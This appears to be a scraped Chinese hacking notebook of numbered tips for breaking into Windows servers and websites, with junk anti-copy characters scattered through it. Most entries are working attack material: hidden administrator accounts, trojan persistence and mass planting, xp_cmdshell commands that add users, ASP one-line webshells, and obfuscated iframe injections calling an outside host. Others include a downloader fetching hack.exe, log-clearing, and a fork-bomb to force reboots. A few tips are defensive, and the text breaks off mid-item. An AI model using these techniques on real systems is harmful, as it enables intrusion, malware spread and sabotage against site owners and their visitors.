一些笔记

admin

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
: [; R" M6 U2 ]8 c. Fcacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

5 N+ W! R; @8 ~% y" B2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

; i5 W' T! c3 t) c/ [3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。
  g4 K9 f' v. ?" E8 j
1 Q; ]( O0 W- V" E- b7 V- B4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
4 x/ h0 S5 \3 Q7 e0 s4 h# r
5、利用INF文件来修改注册表
[Version]
Signature="$CHICAGO$"
# Q/ A5 h/ j; p1 U( O) R8 G4 M- H[Defaultinstall]
% \6 ?1 X0 ]: D" D  T& ~addREG=Ating
[Ating]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' D1 a: _7 @5 d- S! @其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
) g% r* {0 ~, D0 q) ^: rHKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
, h1 z2 v& \0 v8 h5 sHKEY_CURRENT_CONFIG 简写为 HKCC
8 ?* o' t' e! h% q$ P0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
, d, F6 V2 Y& e3 a' C  N"1"这里代表是写入或删除注册表键值中的具体数据

6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。
( P$ f2 [& y0 x7 l
9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
2 m  x7 ~6 P1 k# L可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% t3 ^! {* |; H, {; q, m
4 h) }% Z6 ~' G" a2 a4 H10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”

11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
5 m8 `, R* X! \. y. H用法：xsniff –pass –hide –log pass.txt
" `9 D* u5 n) m/ ?9 e
12、google搜索的艺术
搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。

- G) S3 t6 j: [5 [13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

14、cmd中输入 nc –vv –l –p 1987
( w. N; x. S0 g$ \$ c做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# K! d; I/ a7 d7 M9 @' q( r4 k) R
: V! i3 n5 ]# U15、制作T++木马，先写个ating.hta文件,内容为
<script language="VBScript">
* E! P4 n2 T- t' x* L7 j8 v( ]- Wset wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
. i0 z6 p3 W& [window.close
3 S( g, P% H2 R5 u" B4 l  [: a</script>
再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

. G! B5 b3 E- V0 f3 p1 r4 R16、搜索栏里输入
关键字%'and 1=1 and '%'='
: d& x# Q+ h- e" M  @2 {关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
& ^/ A$ a$ p; s8 [: |
* L4 e1 `6 c3 I5 I9 L3 d' T17、挂马代码<html>
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& Y4 t: J, E. k5 f8 n</html>

1 `  M7 f+ P+ H3 e' D( Y& i7 S1 B18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。

19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
6 E; h3 T2 V9 `% D! @5 C用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE
& S1 w0 T" J: A0 S) x

! }2 n' o4 X" R0 R21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。
/ d0 g/ H  A, B) u1 S* A
) q/ {2 t: L+ L% [* D4 f22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~
& Y+ \+ G+ k% p5 t; }1 q/ R' m: t
23、缺少xp_cmdshell时
  V' R1 Q3 w% q$ V! L8 Z7 n尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; {) D) r8 N  j) n假如恢复不成功,可以尝试直接加用户(针对开3389的)
+ }7 \" |, u) D' c  Cdeclare @o int
8 |1 m- {- a6 z5 {( vexec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
. {1 Z% P; t2 _; @2 E8 z% N6 R
+ @) i4 f) L0 z4 j1 c$ |0 O24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: f% V# y( |' h) u3 efor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
0 C  @% q: ^9 o& a7 G; l3 i扫描地址.txt里每个主机名一行 用\\开头

25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
& J! C. J) i, {) [
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志
( m5 J  H  y& J9 ^- K
( F. N' R1 ^2 d  P2 E28、电脑坏了省去重新安装系统的方法
( Z* e) N: |0 v  v纯dos下执行，
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
) h* i& A) g% ]; H4 K6 N, w# K8 Y2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- J/ g8 b0 F* y3 R% t9 V3 d
29、解决TCP/IP筛选 在注册表里有三处，分别是：
+ e0 {9 \" v5 g8 A, S" kHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
3 Z% L& W/ k1 o4 V. k+ LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ d7 l5 I+ `- T) I分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. `0 F; a% @0 A/ y% n( zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# {* T$ J- j. e6 p" H, I8 r命令来导出注册表项
# _% |- M7 U  R然后把三个文件里的EnableSecurityFilters"=dword:00000001，
9 K: D; V/ v/ p改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
+ O) U' Z! T: r  b3 ?1 S  kregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 Y; e2 w5 y: F
& x/ J/ K4 B" K9 n9 w0 l1 t2 p30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
  r5 e' `( \! QSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, @- P# |: `7 X( u; W3 i9 |4 X
9 w* b0 S$ y- m9 q- F3 i9 f/ J. `31、全手工打造开3389工具
打开记事本，编辑内容如下：
% i0 u* W8 l% ?9 I7 Cecho [Components] > c:\sql
' L0 e5 |6 M, [echo TSEnable = on >> c:\sql
  k* R' B$ {$ b/ ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
0 L) ~( U+ W* I! K! Y编辑好后存为BAT文件，上传至肉鸡，执行
! J( K4 p/ k* Q0 N7 K5 s: S( `
  k9 L) F6 z* f' w% k' w) R32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马

33、让服务器重启
写个bat死循环:
8 U' I* a/ Q6 i5 K@echo off
* \- ~3 ^4 F4 s5 z: q! S:loop1
cls
# o3 t/ Q  ?! ]  t2 N2 Pstart cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ _4 D0 g3 X. @
34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
. D; e2 U- A) [. D@echo off
# e- y# ?$ c' ?& Bdate /t >c:/3389.txt
time /t >>c:/3389.txt
( ?9 u5 o& E+ {attrib +s +h c:/3389.bat
1 }3 W. h" v7 ?attrib +s +h c:/3389.txt
! z. ~% H. M4 V% gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
并保存为3389.bat
打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

35、有时候提不了权限的话，试试这个命令，在命令行里输入：
start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。
% K# m- i, P+ p+ N* U8 j
0 h8 k/ u* o) y; e. f36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: d; H" ?1 o' x0 r4 Qecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
, G3 J. b- x5 N& _  Qecho 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
) F- h# ^" C3 r# M然后执行ftp -s:c:\1.bat即可

37、修改注册表开3389两法
5 G, u2 i& x6 u3 ~2 q! w# H! X6 Z（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ i  `6 A% w) G5 {/ Z! B1 jecho Windows Registry Editor Version 5.00 >>3389.reg
6 l: t4 W% e9 u! m0 ^, Q3 w* xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
# b: g5 d# Z2 v9 \# w/ hecho "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
; K% a8 Q/ v' d. cecho "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
) P& ~7 ^( I0 g" b. eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
2 \# q  \2 n+ j0 k) r* P>>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 W( S- F' f/ ]& R6 ~echo "Start"=dword:00000002 >>3389.reg
2 }: V: d8 g" P' kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
3 P: n# J" K+ F  k>>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
" d9 I, [1 n2 _echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
/ Z/ i8 B6 i& T+ C) s* c$ Techo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ m1 @; k+ _9 X) u' ]Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
4 i+ w, K+ d. g9 I7 H0 Q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
9 ~+ c; Q2 c7 A# R0 `用以下ECHO代码写一个REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
& h7 |& I; P6 W) h  U* V6 O+ v; \" Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* o+ [# _7 e; ]% bServer\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
* c7 p: r3 N( W4 j* R+ ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 D9 l% w" \4 q& jServer\WinStations\RDP-Tcp]>>3389.reg
4 y! `5 f5 I- X6 U1 @: H2 ^! cecho "PortNumber"=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启

9 p, j2 n5 s9 _1 ?38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ L+ C7 c3 ]( y% h$ p& S6 b
1 N, t. C2 l6 l9 i7 _39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
（1）数据库文件名应复杂并要有特殊字符
（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
* r( y' W; s- C% oDBPath = Server.MapPath("数据库.mdb")
% U) w' A- C8 {& f5 n9 W7 Cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath

6 f. W  ?' H# }修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
! E! ^+ J$ k6 ^3 L2 g# A（3）不放在WEB目录里
7 }& ]4 U. a8 f% Y
40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
1 s7 X% Y0 @* \/ _* g% X可以写两个bat文件
& ^  i5 i7 W( H8 a  g. t* Z@echo off
2 k( x4 R7 ^# n% l& N@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

# z- O3 L! S7 m5 V@echo off
8 z2 E( \2 s! R" F: c/ a: |4 x@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
+ V$ R- V9 F2 Z* q4 C@del c:\winnt\system32\tsadmin.exe
, a0 ?' p3 j- j! q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 T& v. D. e# U6 X7 Z6 w
7 T- ]! J( _8 M* s2 ]* i1 x41、映射对方盘符
telnet到他的机器上，
  V6 Y+ D- _  ?. [* o! Enet share 查看有没有默认共享 如果没有，那么就接着运行
  g2 ?/ r  z# f6 d' Snet share c$=c:
net share现在有c$
在自己的机器上运行
0 s2 j3 _( [  Ynet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

42、一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
) l' D* _$ D2 v( R- @8 Mnet start (查看已经启动的服务)
query user ( 查看当前终端连接 )
' |/ ^- l7 O, {2 R% y: S1 _; G- Qnet user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
: M1 ~, H8 F  vipconfig -all ( 查看IP什么的 )
! Z! K0 K1 i! d) y$ tnetstat -an ( 查看当前网络状态 )
, h% t& z/ f$ `. lfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ I7 N* g* _2 k7 M# |; K克隆时Administrator对应1F4
$ f6 u; O* e! x' }( E. M8 Aguest对应1F5
tsinternetuser对应3E8

43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
7 }0 i. W) Z& _
- \  [6 ^* b1 d; E/ k44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
; _; p5 L* m4 m% S: R) u% s& p* M本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）
4 j- [% ~+ D6 _, d6 F+ y6 l$ H
, B5 |) i  X3 l3 ?# q5 R6 U7 o1 {45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" {0 c& V9 P) d5 z+ z3 dCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
4 v6 Q3 p/ n$ c! a4 }0 _8 x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
（这是完整的一句话，其中没有换行符）
/ E! R8 k7 F, f) K% t! y% K然后下载:
4 Q( m; K$ ?5 Scscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

47、利用DB_OWNER权限进行手工备份一句话木马的代码：
6 F7 H7 Q* a5 m. {4 T4 d;alter database utsz set RECOVERY FULL--
  P/ M& b# T, Q& `+ X. l7 [$ q2 f;create table cmd (a image)--
# m4 P* r3 G8 w5 A;backup log utsz to disk = 'D:\cmd' with init--
# c2 c& |5 B6 F6 O$ O5 j, A  |;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# N3 X8 D* A, Y4 O;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
9 U7 B4 g- U! u
  g. F$ @4 V% i3 [2 p4 p48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：
, @* @4 x) [; x$ q
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 S# A$ }5 B' J所有会话用 'all'。
& H+ I5 z8 `% C# T6 X/ b& W! C2 E-s sessionid 列出会话的信息。
-k sessionid 终止会话。
& H- u& u7 w8 U! g7 I-m sessionid 发送消息到会话。

/ U/ @. R+ V; u! Rconfig 配置 telnet 服务器参数。

5 O  j# o# k8 d7 ^7 D6 h$ Ycommon_options 为:
, g9 |! i+ C" `- N-u user 指定要使用其凭据的用户
  w# K. g: u( P. s2 x/ o$ x- ~-p password 用户密码

" \& G1 S$ u5 J* [0 h' \7 A2 _config_options 为:
* M. h, E7 v' z+ Mdom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值
$ X2 j6 \6 r7 \) Z' Ktimeoutactive = yes|no 启用空闲会话。
maxfail = attempts 设定断开前失败的登录企图数。
+ S; m: A6 \# W7 r( r, ]* `: Z0 D% Mmaxconn = connections 设定最大连接数。
port = number 设定 telnet 端口。
sec = [+/-]NTLM [+/-]passwd
# b4 g4 h! t% h$ [; ?5 N/ S设定身份验证机构
fname = file 指定审计文件名。
fsize = size 指定审计文件的最大尺寸(MB)。
mode = console|stream 指定操作模式。
' H+ y/ m7 e9 p. pauditlocation = eventlog|file|both
指定记录地点
audit = [+/-]user [+/-]fail [+/-]admin

49、例如:在IE上访问:
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% K+ x6 Y4 B! P3 dhack.txt里面的代码是：
' ~" F. y% w3 m$ \4 S/ J<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
" F( H* t5 d$ H. |$ r, J把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
3 \* C* Q4 e/ p1 W: O1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
7 |7 d$ [8 K" ?. k4 q2，打开盘符用右键打开！切忌双击盘符～
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！
4 U- G" K) N6 c( B% G+ S
) u6 ^) w5 N3 d" q+ E+ J51、log备份时的一句话木马：
. a/ `/ a: u+ X6 W) ba).<%%25Execute(request("go"))%%25>
& U! c& |) k( H- V/ \9 s# Y5 ub).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
, [5 N) E+ u! k7 X8 M$ i  t, Y% Ad).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
$ W& G: i# a3 H4 |f).<%if request("cmd")<>"" then execute request("pass")%>
' B, z& O4 t) ]
7 |" ?# u9 `- l9 ?# r4 x52、at "12:17" /interactive cmd
执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

53、隐藏ASP后门的两种方法
5 ?+ H% \" g9 L1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
5 C5 R0 i. J$ H( N如何删除非标准目录：rmdir images..\ /s
, ]" g2 w* e3 G3 j! q4 x1 X2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：<!--#include file=”12.jpg”-->
: J: b/ v  r2 x1 x0 u新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 b- ^- j9 J- Sattrib +H +S programme.asp
+ u/ V7 j+ }5 c7 d" h8 [通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt
8 h8 [" z9 H$ w4 h7 X( v' |  q' S
54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
% o% ?( ?5 t6 u7 I然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。
3 ]. ^3 p. C9 w
55、JS隐蔽挂马
4 s( V9 F0 M( @3 \/ @  u1.
. L( h( t* i; e& W9 d4 s- r8 Nvar tr4c3="<iframe src=ht";
: f3 L: K  Q8 w' T. {/ D4 ^+ ctr4c3 = tr4c3+"tp:/";
tr4c3 = tr4c3+"/ww";
4 v( R! Q" }9 vtr4c3 = tr4c3+"w.tr4";
tr4c3 = tr4c3+"c3.com/inc/m";
- G+ ^3 f6 I+ [& {; ~tr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
+ l9 Z, @/ C) H( ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。
: W; Q& O& f- Q5 `
2.
# t1 }2 [0 n* [5 C7 P5 f, s转换进制，然后用EVAL执行。如
+ r  u5 ~* \5 B# G8 I  ]# H0 \eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& m: a4 M* w) d& U2 Y& t不过这个有点显眼。
3.
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
0 l; i9 o& K* u  M% P+ J- Q  D最后一点，别忘了把文件的时间也修改下。
5 I# B7 O3 G7 g$ k8 z
1 X/ o0 ]- b! J56.3389终端入侵常用DOS命令
5 M$ N: t& _& E1 {taskkill taskkill /PID 1248 /t
1 q8 ]5 y/ k% J, O
tasklist 查进程
: Q. i) e5 Z( C. M# O
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. Q5 U  }+ [  miisreset /reboot
4 x& \9 X$ W" K0 U1 ]: V4 Ptsshutdn /reboot /delay:1    重起服务器

logoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，
& E+ l, g; Y5 s5 u  R2 \5 {
. o9 g7 D+ i/ l/ }' f: Xquery user 查看当前终端用户在线情况
1 H3 z9 s6 g) J) S% j5 R/ o
/ v8 t4 A; J( h5 q8 S  H要显示有关所有会话使用的进程的信息，请键入：query process *

3 @/ k% g/ u# c1 }7 E要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

# |8 U' T0 ~0 @  f要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

# T. f, G( I' \/ ^要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

+ ], P. d3 b/ r! X- o& o命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 i  W2 j$ F1 w1 t
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. h5 n( S0 Y8 ?: \
: {, \; U) W6 v% ]3 F! V命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

5 a6 E. f* Q: j6 n, G! M5 c& q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
% s8 V5 `( U/ y  D9 _
- l* F. l7 j# U& U! T  {, D' D56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* E4 ]5 T7 z/ A: d. h
/ |" N8 l2 P; [1 j源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。
, F5 Q5 O/ a% x- C7 e" }% O
3 F. m: P$ z' E' k5 m, o57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
+ D$ k  U4 g* \# l' g! ]用net localgroup administrators是可以看到管理组下，加了$的用户的。
7 ]+ M, h. ~! N3 j5 x6 z9 L1 j9 P' o
3 D; k& b' j. [* j- p" l3 ?' U58、 sa弱口令相关命令
4 l) P5 g& x& B- f0 z  {: M+ n9 j
2 D7 T% V! f5 {/ Z$ j3 E一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
! \# H+ N# i4 {  Vexec sp_password NULL,'20001001','sa'
0 m" u1 |$ u% V  R2 U$ h. D' @" e8 v(提示：慎用!)
1 ^1 K6 }5 Z7 {1 H! f
二.简单修补sa弱口令.

0 n$ n4 ^1 d" [, k+ q方法1:查询分离器连接后执行：
3 c% u5 r! O" H! R# Zif exists (select * from
( \5 f4 c6 }; w& \dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) ^# f5 B* [5 x! ]" C- b  A
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' b6 j! }. P5 v6 m0 I1 G) `- o
3 @$ T* i& a9 m  m/ x# R" L" o4 JGO
6 I7 k3 O9 k) y3 q$ i
然后按F5键命令执行完毕
7 M- T9 b& L  t1 g
方法2:查询分离器连接后
# D1 r" y$ x6 r第一步执行：use master
! B5 K9 x  Z6 E3 y& |第二步执行：sp_dropextendedproc 'xp_cmdshell'
- w2 A4 ^+ {, T& v: E. I0 S然后按F5键命令执行完毕
5 K/ b$ s3 N1 a, c6 y

三.常见情况恢复执行xp_cmdshell.
* v7 m9 ~' b& f( M5 g7 D  z

  ^& V7 ]/ s. @, X6 x% F, U1 未能找到存储过程'master..xpcmdshell'.
